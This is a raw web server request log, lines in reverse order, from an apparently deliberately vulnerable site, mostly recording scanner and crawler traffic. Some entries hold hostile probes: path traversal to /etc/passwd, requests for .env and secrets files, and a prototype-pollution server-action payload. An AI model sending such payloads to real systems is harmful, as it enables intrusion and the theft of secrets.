User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:42590
Path: /
URL: /
Method: GET
[2026-02-28 12:34:20] === HTTP Request ===
[2026-02-28 12:10:17] Main page accessed - IP: 172.30.0.12:55222
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 98.87.115.128
Via: 1.1 Caddy
Accept-Encoding: deflate, gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55222
Path: /
URL: /
Method: GET
[2026-02-28 12:10:17] === HTTP Request ===
[2026-02-28 10:59:45] Main page accessed - IP: 205.210.31.184:63424
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.184:63424
Path: /
URL: /
Method: GET
[2026-02-28 10:59:45] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=1
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-Proto: https
Referer: https://admin.vulnberries.ru/login
X-Forwarded-For: 205.169.39.7
Via: 2.0 Caddy
Pragma: no-cache
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40718
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
X-Forwarded-For: 205.169.39.7
Sec-Fetch-Mode: no-cors
Priority: u=1
Referer: https://admin.vulnberries.ru/login
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-Proto: https
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40736
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
===================
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: no-cors
Accept: text/css,*/*;q=0.1
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Priority: u=0
Pragma: no-cache
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/login
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-For: 205.169.39.7
Sec-Fetch-Dest: style
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40734
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
[2026-02-28 10:13:35] Login page accessed - IP: 172.30.0.12:40734
===================
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Via: 2.0 Caddy
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/
Pragma: no-cache
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 205.169.39.7
Sec-Fetch-Site: same-origin
Priority: u=0, i
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40734
Path: /login
URL: /login
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 205.169.39.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Priority: u=1
Pragma: no-cache
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40734
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
===================
Sec-Fetch-Dest: script
X-Forwarded-For: 205.169.39.7
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Priority: u=1
Pragma: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40718
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
===================
Referer: https://admin.vulnberries.ru/
Priority: u=0
Pragma: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Cache-Control: no-cache
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
X-Forwarded-For: 205.169.39.7
Accept: text/css,*/*;q=0.1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40718
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
[2026-02-28 10:13:35] Main page accessed - IP: 172.30.0.12:40718
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 205.169.39.7
Priority: u=0, i
Cache-Control: no-cache
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40718
Path: /
URL: /
Method: GET
[2026-02-28 10:13:35] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
X-Requested-With: XMLHttpRequest
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53230
Path: /dispatch.asp
URL: /dispatch.asp
Method: GET
[2026-02-28 09:52:33] === HTTP Request ===
===================
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.26
From: oai-searchbot(at)openai.com
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50622
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-28 09:47:40] === HTTP Request ===
[2026-02-28 08:56:35] Main page accessed - IP: 147.185.132.234:63894
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 147.185.132.234:63894
Path: /
URL: /
Method: GET
[2026-02-28 08:56:35] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.125:56068
Path: /security.txt
URL: /security.txt
Method: GET
[2026-02-28 08:56:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.125:56626
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 08:56:11] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.125:56596
Path: *
URL: *
Method: PRI
[2026-02-28 08:56:11] === HTTP Request ===
[2026-02-28 08:56:10] Main page accessed - IP: 66.132.153.125:56564
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.125:56564
Path: /
URL: /
Method: GET
[2026-02-28 08:56:10] === HTTP Request ===
[2026-02-28 08:10:04] Main page accessed - IP: 146.190.153.30:34182
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 146.190.153.30:34182
Path: /
URL: /
Method: GET
[2026-02-28 08:10:04] === HTTP Request ===
[2026-02-28 06:19:13] Main page accessed - IP: 172.236.228.86:10872
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.228.86:10872
Path: /
URL: /
Method: GET
[2026-02-28 06:19:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:51172
Path: /jars
URL: /jars
Method: GET
[2026-02-28 06:12:14] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.2:51772
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 05:50:27] === HTTP Request ===
[2026-02-28 05:50:27] Main page accessed - IP: 85.217.140.2:51758
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.2:51758
Path: /
URL: /
Method: GET
[2026-02-28 05:50:27] === HTTP Request ===
[2026-02-28 05:44:50] Main page accessed - IP: 192.109.200.205:17364
===================
------B1772257490256680472--
"$@0"
Content-Disposition: form-data; name="1"
------B1772257490256680472
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------B1772257490256680472
Next-Action: x
Content-Type: multipart/form-data; boundary=----B1772257490256680472
Content-Length: 358
User-Agent: Mozilla/5.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.109.200.205:17364
Path: /
URL: /
Method: POST
[2026-02-28 05:44:50] === HTTP Request ===
[2026-02-28 05:44:50] Main page accessed - IP: 192.109.200.205:17352
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.109.200.205:17352
Path: /
URL: /
Method: GET
[2026-02-28 05:44:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:62636
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-02-28 05:18:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:62622
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-28 05:18:16] === HTTP Request ===
[2026-02-28 04:32:00] Main page accessed - IP: 172.30.0.12:35018
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.55
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35018
Path: /
URL: /
Method: GET
[2026-02-28 04:32:00] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.11:57751
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 03:45:11] === HTTP Request ===
[2026-02-28 03:43:33] Main page accessed - IP: 91.230.168.84:48813
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.84:48813
Path: /
URL: /
Method: GET
[2026-02-28 03:43:33] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50004
Path: /.env.production
URL: /.env.production
Method: GET
[2026-02-28 02:48:03] === HTTP Request ===
[2026-02-28 02:23:48] Main page accessed - IP: 185.247.137.29:53577
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.247.137.29:53577
Path: /
URL: /
Method: GET
[2026-02-28 02:23:48] === HTTP Request ===
[2026-02-28 02:05:43] Main page accessed - IP: 198.235.24.39:65484
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 198.235.24.39:65484
Path: /
URL: /
Method: GET
[2026-02-28 02:05:43] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 65.49.1.203:17347
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-02-28 00:51:27] === HTTP Request ===
[2026-02-28 00:51:14] Main page accessed - IP: 65.49.1.203:46551
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 65.49.1.203:46551
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-02-28 00:51:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.203:43665
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-28 00:50:33] === HTTP Request ===
[2026-02-28 00:49:27] Main page accessed - IP: 65.49.1.202:36382
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.202:36382
Path: /
URL: /
Method: GET
[2026-02-28 00:49:27] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:34398
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-02-28 00:36:14] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.241:55486
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-02-28 00:13:41] === HTTP Request ===
[2026-02-27 23:39:26] Main page accessed - IP: 205.210.31.50:60430
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 205.210.31.50:60430
Path: /
URL: /
Method: GET
[2026-02-27 23:39:26] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:59930
Path: /jars
URL: /jars
Method: GET
[2026-02-27 22:38:37] === HTTP Request ===
[2026-02-27 22:36:31] Main page accessed - IP: 207.90.244.20:35866
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:35866
Path: /
URL: /
Method: GET
[2026-02-27 22:36:31] === HTTP Request ===
[2026-02-27 22:07:23] Main page accessed - IP: 147.185.132.46:51987
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.46:51987
Path: /
URL: /
Method: GET
[2026-02-27 22:07:23] === HTTP Request ===
[2026-02-27 21:46:31] Main page accessed - IP: 45.156.87.19:8072
===================
------B1772228791634372555--
"$@0"
Content-Disposition: form-data; name="1"
------B1772228791634372555
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------B1772228791634372555
Connection: close
Accept-Encoding: gzip
Next-Action: x
Content-Type: multipart/form-data; boundary=----B1772228791634372555
Content-Length: 358
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.87.19:8072
Path: /
URL: /
Method: POST
[2026-02-27 21:46:31] === HTTP Request ===
[2026-02-27 21:46:31] Main page accessed - IP: 45.156.87.19:8058
===================
User-Agent: Mozilla/5.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.87.19:8058
Path: /
URL: /
Method: GET
[2026-02-27 21:46:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:57194
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 20:02:07] === HTTP Request ===
[2026-02-27 20:02:07] Main page accessed - IP: 85.142.100.106:57192
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:57192
Path: /
URL: /
Method: GET
[2026-02-27 20:02:07] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50019
Path: /secrets.py
URL: /secrets.py
Method: GET
[2026-02-27 20:01:21] === HTTP Request ===
[2026-02-27 19:53:25] Main page accessed - IP: 139.59.170.85:55866
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 139.59.170.85:55866
Path: /
URL: /
Method: GET
[2026-02-27 19:53:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:60064
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 19:30:52] === HTTP Request ===
[2026-02-27 19:30:52] Main page accessed - IP: 85.142.100.106:60050
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:60050
Path: /
URL: /
Method: GET
[2026-02-27 19:30:52] === HTTP Request ===
[2026-02-27 19:27:34] Main page accessed - IP: 198.235.24.40:62254
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 198.235.24.40:62254
Path: /
URL: /
Method: GET
[2026-02-27 19:27:34] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:34932
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 18:59:12] === HTTP Request ===
[2026-02-27 18:59:12] Main page accessed - IP: 85.142.100.106:34928
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:34928
Path: /
URL: /
Method: GET
[2026-02-27 18:59:12] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46890
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 18:48:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:60232
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 18:31:05] === HTTP Request ===
[2026-02-27 18:31:05] Main page accessed - IP: 85.142.100.106:60230
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:60230
Path: /
URL: /
Method: GET
[2026-02-27 18:31:05] === HTTP Request ===
[2026-02-27 17:17:14] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:33162
===================
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept: */*
X-Forwarded-For: 178.141.21.178
Accept-Encoding: gzip, deflate, br, zstd
Via: 1.1 Caddy
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33162
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-02-27 17:17:14] === HTTP Request ===
[2026-02-27 17:16:55] Login page accessed - IP: 172.30.0.12:33162
===================
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.141.21.178
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "Windows"
